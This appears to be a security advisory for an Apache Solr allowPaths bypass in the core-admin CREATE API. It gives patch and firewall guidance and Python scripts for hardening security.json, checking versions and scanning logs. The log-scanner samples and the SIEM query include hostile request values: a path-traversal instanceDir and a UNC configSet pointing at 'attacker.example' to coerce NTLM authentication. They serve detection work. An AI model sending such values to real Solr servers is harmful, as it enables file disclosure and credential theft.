CVE-2026-22444
📋 TL;DR
This vulnerability in Apache Solr lets an attacker who can reach the core-admin CREATE API bypass the allowPaths restriction: the path parameters of a new core (for example instanceDir, dataDir or configSet) can be pointed at locations outside Solr home, so files and configsets the restriction was meant to protect become readable. On Windows hosts a UNC path supplied this way can make the Solr process authenticate to an attacker-controlled SMB server, disclosing NTLM hashes. Affected deployments run Solr in standalone (non-SolrCloud) mode, rely on allowPaths to fence core locations, and expose the create core API to untrusted users.
💻 Affected Systems
- Apache Solr
📦 What is this software?
Apache Solr is an open-source search platform built on Apache Lucene. Cores (standalone mode) and collections (SolrCloud) are created and managed through its HTTP admin APIs, including the core-admin API at /solr/admin/cores.
⚠️ Risk & Real-World Impact
Worst Case
An attacker reads sensitive files from the Solr host, loads configsets they are not authorized to use, and on Windows captures the Solr service account's NTLM hash through a UNC path, enabling credential theft and lateral movement.
Likely Case
Unauthorized access to Solr configsets and disclosure of other files that are readable by the Solr service account.
If Mitigated
Minimal impact if proper authorization controls prevent untrusted users from accessing the create core API.
🎯 Exploit Status
Exploitation requires the ability to call the core-admin API (/solr/admin/cores with action=CREATE). This is not an authentication bypass: a Solr instance without authentication exposes that API to anyone who can reach the port, while an instance with RuleBasedAuthorizationPlugin exposes it only to users holding core-admin-edit.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: Apache Solr 9.10.1 or greater
Vendor Advisory: https://lists.apache.org/thread/qkrb9dd4xrlqmmq73lrhkbfkttto2d1m
Restart Required: Yes
Instructions:
1. Download Apache Solr 9.10.1 or later from the official Apache website.
2. Back up the current Solr configuration and data.
3. Stop the Solr service.
4. Replace the Solr installation with the patched version.
5. Restore configuration and data.
6. Start the Solr service.
7. Verify the version and functionality.
🔧 Temporary Workarounds
Enable and Configure RuleBasedAuthorizationPlugin
Enable the authorization plugin and restrict core creation to admin users only.
Configure security.json to enable RuleBasedAuthorizationPlugin and bind core-admin-edit (and core-admin-read, security-edit and all) to an admin role; with an authentication plugin set to blockUnknown, unauthenticated callers never reach the core-admin API.
Restrict API Access via Network Controls
Use host firewall rules to limit access to the Solr port (8983 by default) to trusted addresses. Replace trusted_ips with the real address or CIDR, and keep the ACCEPT rule ahead of the DROP rule:
iptables -A INPUT -p tcp --dport 8983 -s trusted_ips -j ACCEPT
iptables -A INPUT -p tcp --dport 8983 -j DROP
🧯 If You Can't Patch
- Enable RuleBasedAuthorizationPlugin and ensure only admin users have core-admin-edit permission
- Implement network segmentation to restrict access to Solr API from untrusted networks
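The two authorization recommendations above (the RuleBasedAuthorizationPlugin workaround and the core-admin-edit rule for unpatched hosts) amount to one security.json shape. The following is an added example, not Apache Solr code: it builds such a file and audits an existing one for the gaps that leave the core-admin API reachable. The plugin class names, the predefined permission names, blockUnknown and the user-role mapping are Solr's documented security.json settings; the user name "solr" and the role name "admin" are illustrative assumptions, and the credential is the reference guide's example hash, which must be replaced.

```python
"""Build and audit a Solr security.json that keeps core administration admin-only.

Added example for this advisory; it is not Apache Solr code. The user name
"solr" and role name "admin" are illustrative assumptions.
"""
import json

# Predefined Solr permissions that must be bound to a real role.
PRIVILEGED = ("core-admin-edit", "core-admin-read", "security-edit", "all")

# The Solr reference guide's example credential (user "solr", password "SolrRocks").
# Replace it with a hash you generate yourself before deploying.
EXAMPLE_HASH = ("IV0EHq1OnNrj6gvRCwvFwTrZ1+z1oBbnQdiVC3otuq0= "
                "Ndd7LKvVBAaZIF0QAVi1ekCfAJXr1GGfLtRUXhgrF8c=")


def hardened_security_json(admin_user, admin_hash):
    """Admin-only core administration. Rules match first-to-last, so 'all' goes last."""
    return {
        "authentication": {
            "class": "solr.BasicAuthPlugin",
            "blockUnknown": True,  # reject unauthenticated requests outright
            "credentials": {admin_user: admin_hash},
        },
        "authorization": {
            "class": "solr.RuleBasedAuthorizationPlugin",
            "permissions": [
                {"name": "core-admin-edit", "role": "admin"},  # CREATE, UNLOAD, RENAME, ...
                {"name": "core-admin-read", "role": "admin"},
                {"name": "security-edit", "role": "admin"},
                {"name": "all", "role": "admin"},  # everything else is admin-only too
            ],
            "user-role": {admin_user: "admin"},
        },
    }


def audit_security_json(doc):
    """Return findings that leave the core-admin API reachable by untrusted callers."""
    findings = []
    auth = doc.get("authentication") or {}
    authz = doc.get("authorization") or {}

    if not auth.get("class"):
        findings.append("no authentication plugin: every caller is anonymous")
    elif auth.get("blockUnknown") is False:
        findings.append("blockUnknown=false: anonymous requests are passed on to authorization")

    if authz.get("class") != "solr.RuleBasedAuthorizationPlugin":
        findings.append("RuleBasedAuthorizationPlugin not enabled: no permission rules apply")
        return findings

    seen = set()
    for rule in authz.get("permissions", []):
        name, role = rule.get("name"), rule.get("role")
        roles = role if isinstance(role, list) else [role]
        if name in PRIVILEGED:
            seen.add(name)
            # role null = anyone (including anonymous), "*" = any authenticated user
            if any(r in (None, "*") for r in roles):
                findings.append(f"{name} granted to {roles}: not restricted to an admin role")
    if "core-admin-edit" not in seen and "all" not in seen:
        findings.append("no rule for core-admin-edit: unmatched requests are allowed by default")
    return findings


# Constructed weak configuration: authenticated, but core creation is left unrestricted.
WEAK = {
    "authentication": {"class": "solr.BasicAuthPlugin", "blockUnknown": False,
                       "credentials": {"solr": EXAMPLE_HASH}},
    "authorization": {"class": "solr.RuleBasedAuthorizationPlugin",
                      "permissions": [{"name": "security-edit", "role": "admin"}],
                      "user-role": {"solr": "admin"}},
}

HARDENED = hardened_security_json("solr", EXAMPLE_HASH)

if __name__ == "__main__":
    print("weak:", audit_security_json(WEAK))
    print("hardened:", audit_security_json(HARDENED))
    print(json.dumps(HARDENED, indent=2))
```

The hardened file locks non-admins out of everything because the final "all" rule catches whatever the earlier rules did not; if search clients need access, add a "read" permission bound to their role before the "all" rule.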
🔍 How to Verify
Check if Vulnerable:
Check the Solr version with 'bin/solr version' and confirm whether it falls in the affected range 8.6.0 through 9.10.0 inclusive. Then check whether the node runs in standalone mode (started without -c / SolrCloud and without a ZooKeeper ensemble) and whether allowPaths is configured, either through the solr.allowPaths system property or the allowPaths setting in solr.xml.
Check Version:
bin/solr version
Verify Fix Applied:
Verify that 'bin/solr version' reports 9.10.1 or higher. Then, from a trusted account, submit a core CREATE request whose instanceDir or configSet points outside Solr home and the allowPaths entries and confirm that the request is rejected rather than creating the core.
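An added example (not Apache Solr code) for the version check above: it parses the text printed by 'bin/solr version' and compares release numbers as integer tuples, so "9.10.0" is correctly placed after "9.2.0" rather than before it as a string comparison would do. The sample version strings are constructed, and the standalone and allowPaths facts are supplied by the operator as described in the text.

```python
"""Decide whether a Solr node is in the range this advisory describes.

Added example, not Apache Solr code. Reads the output of `bin/solr version`
(sample strings below are constructed) plus two operator-supplied facts.
"""
import re

AFFECTED_FROM = (8, 6, 0)   # first affected release named on this page
FIXED_IN = (9, 10, 1)       # first fixed release


def parse_version(output):
    """Extract the first X.Y or X.Y.Z release number from `bin/solr version` output."""
    m = re.search(r"\b(\d+)\.(\d+)(?:\.(\d+))?\b", output)
    if not m:
        raise ValueError(f"no version found in: {output!r}")
    major, minor, patch = m.groups()
    return int(major), int(minor), int(patch or 0)


def version_in_affected_range(version):
    # Tuple comparison: (9, 10, 0) > (9, 2, 0), unlike the strings "9.10.0" and "9.2.0".
    return AFFECTED_FROM <= version < FIXED_IN


def assess(version_output, standalone, allow_paths_configured):
    """Return (in_scope, reason) for one node."""
    v = parse_version(version_output)
    label = ".".join(map(str, v))
    if not version_in_affected_range(v):
        return False, f"{label} is outside the affected range 8.6.0 to 9.10.0"
    if not standalone:
        return False, f"{label} runs in SolrCloud mode; this advisory covers standalone mode"
    if not allow_paths_configured:
        return False, f"{label} has no allowPaths configured; still update to 9.10.1 or later"
    return True, f"{label} standalone with allowPaths: update to 9.10.1 or later"


if __name__ == "__main__":
    for sample in ("9.10.0", "Solr version 9.10.1", "8.11.2", "8.5.2"):
        print(sample, "->", assess(sample, standalone=True, allow_paths_configured=True))
```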
📡 Detection & Monitoring
Log Indicators:
- Core CREATE requests whose instanceDir, dataDir, config, schema or configSet parameters point outside Solr home and the allowPaths entries
- Core creation requests with unusual path parameters
- Failed authorization attempts for core-admin-edit operations
Network Indicators:
- HTTP requests (GET or POST) to /solr/admin/cores with action=CREATE and path traversal sequences or absolute paths in the path parameters
- Outbound SMB connections (TCP 445) from a Windows Solr host to unexpected destinations, the side effect of a UNC path supplied in a core CREATE request
SIEM Query:
source="solr.log" AND "admin/cores" AND "action=CREATE" AND ("../" OR "..\\" OR "\\\\" OR "%2e%2e" OR "%5c%5c")
Note: the query is written in Splunk syntax; the percent-encoded variants cover requests whose parameters were logged before decoding.
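The indicators above can be checked offline against exported Solr logs. The following is an added example, not Apache Solr code: it parses request log lines for core CREATE calls, normalizes the path parameters (percent-decoding, including double encoding, and backslash to slash) and flags traversal segments, UNC paths and absolute paths outside the allowed roots. The log lines are constructed to follow the shape of Solr's request log (path=... params={...} status=...), and the allowed roots are assumptions for the example.

```python
"""Offline triage of Solr request-log lines for core CREATE requests that try to
escape allowPaths.

Added example for this advisory; it is not Apache Solr code. The sample lines
are constructed, and ALLOWED_ROOTS is an assumption for the example.
"""
import re
from urllib.parse import parse_qsl, unquote

# Core CREATE parameters that name filesystem locations (documented Solr params).
PATH_PARAMS = ("instanceDir", "dataDir", "config", "schema", "configSet", "ulogDir")

REQUEST_RE = re.compile(
    r"path=(?P<path>\S+)\s+params=\{(?P<params>.*?)\}\s+status=(?P<status>\d+)")
DRIVE_RE = re.compile(r"^[A-Za-z]:/")


def parse_request_line(line):
    """Return (path, params, status) for a request log line, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    params = dict(parse_qsl(m.group("params"), keep_blank_values=True))
    return m.group("path"), params, int(m.group("status"))


def normalize(value, rounds=3):
    """Undo percent-encoding (including double encoding) and unify separators."""
    prev = None
    for _ in range(rounds):
        if value == prev:
            break
        prev, value = value, unquote(value)
    return value.replace("\\", "/")


def is_absolute(norm):
    return norm.startswith("/") or bool(DRIVE_RE.match(norm))


def under_root(norm, roots):
    return any(norm == r or norm.startswith(r.rstrip("/") + "/") for r in roots)


def suspicious_reasons(params, allowed_roots):
    """Explain why a CREATE request's path parameters look like an allowPaths escape."""
    roots = tuple(normalize(r) for r in allowed_roots)
    reasons = []
    for name in PATH_PARAMS:
        if name not in params:
            continue
        raw = params[name]
        norm = normalize(raw)
        if norm.startswith("//"):
            reasons.append(f"{name}: UNC path {raw!r} (NTLM coercion risk on Windows)")
        elif ".." in norm.split("/"):
            reasons.append(f"{name}: directory traversal in {raw!r}")
        elif is_absolute(norm) and not under_root(norm, roots):
            reasons.append(f"{name}: absolute path {raw!r} outside allowed roots")
    return reasons


def scan(lines, allowed_roots):
    """Return [(line, reasons)] for core CREATE requests that trip a heuristic."""
    hits = []
    for line in lines:
        parsed = parse_request_line(line)
        if parsed is None:
            continue
        path, params, _status = parsed
        if not path.endswith("/admin/cores") or params.get("action", "").upper() != "CREATE":
            continue
        reasons = suspicious_reasons(params, allowed_roots)
        if reasons:
            hits.append((line, reasons))
    return hits


# Constructed sample lines (not from a real deployment).
SAMPLE_LOG = [
    "2026-01-15 10:00:01.123 INFO  (qtp1-12) [   ] o.a.s.s.HttpSolrCall [admin] webapp=null path=/admin/cores params={action=CREATE&name=products&instanceDir=products&configSet=_default} status=0 QTime=120",
    "2026-01-15 10:00:02.456 INFO  (qtp1-13) [   ] o.a.s.s.HttpSolrCall [admin] webapp=null path=/admin/cores params={action=CREATE&name=x&instanceDir=..%2F..%2F..%2Fetc} status=400 QTime=3",
    "2026-01-15 10:00:03.789 INFO  (qtp1-14) [   ] o.a.s.s.HttpSolrCall [admin] webapp=null path=/admin/cores params={action=CREATE&name=y&configSet=%5C%5Cattacker.example%5Cshare%5Cconf} status=500 QTime=2100",
    "2026-01-15 10:00:04.000 INFO  (qtp1-15) [   ] o.a.s.s.HttpSolrCall [admin] webapp=null path=/admin/cores params={action=STATUS} status=0 QTime=1",
    "2026-01-15 10:00:05.000 INFO  (qtp1-16) [   ] o.a.s.s.HttpSolrCall [admin] webapp=null path=/admin/cores params={action=CREATE&name=z&dataDir=/var/solr/data/z} status=0 QTime=50",
]

ALLOWED_ROOTS = ("/var/solr", "C:\\solr")  # assumed Solr home and allowPaths entries

if __name__ == "__main__":
    for line, reasons in scan(SAMPLE_LOG, ALLOWED_ROOTS):
        print(line.split("params=")[1], "->", "; ".join(reasons))
```

Note that a status of 400 or 500 does not mean the attempt failed harmlessly: on a Windows host the UNC path in the third sample can trigger the outbound SMB authentication before Solr reports an error, so the request itself is the indicator.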